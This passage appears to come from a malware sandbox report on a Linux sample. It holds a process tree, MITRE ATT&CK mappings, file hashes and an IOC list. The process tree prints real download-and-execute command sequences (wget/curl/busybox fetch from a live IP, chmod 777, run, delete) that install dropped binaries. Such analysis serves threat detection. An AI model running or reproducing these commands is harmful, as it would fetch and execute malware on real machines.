  curl -O http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:894
- /bin/chmod
  chmod 777 bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  ./bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:897
- /usr/bin/wget
  wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:900
- /bin/chmod
  chmod 777 VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  ./VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:903
- /usr/bin/wget
  wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:904
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:906
- /bin/chmod
  chmod 777 SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - File and Directory Permissions Modification
  PID:907
- /tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  ./SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Executes dropped EXE
  PID:908
- /bin/rm
  rm SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:909
- /usr/bin/wget
  wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:910
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:911
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:912
- /bin/chmod
  chmod 777 cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  ./cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Executes dropped EXE
  PID:914
- /bin/rm
  rm cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:915
- /usr/bin/wget
  wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:916
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:918
- /bin/chmod
  chmod 777 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  ./57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Executes dropped EXE
  PID:922
- /bin/rm
  rm 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:923
- /usr/bin/wget
  wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/792-1-0xb6754000-0xb6765044-memory.dmp

Download
memory/884-2-0xb677e000-0xb678f044-memory.dmp

Download
memory/910-3-0xb6755000-0xb6766044-memory.dmp

Download

ioc	pid	process
/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	686	BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	695	evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	704	8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	721	57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	740	K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	758	n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	772	de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	790	YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	811	NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	825	WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	831	bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	837	VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	843	SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	849	cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	855	NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	863	WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	869	K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	875	n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	882	de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	888	YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	896	bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	902	VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	908	SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	914	cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	922	57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv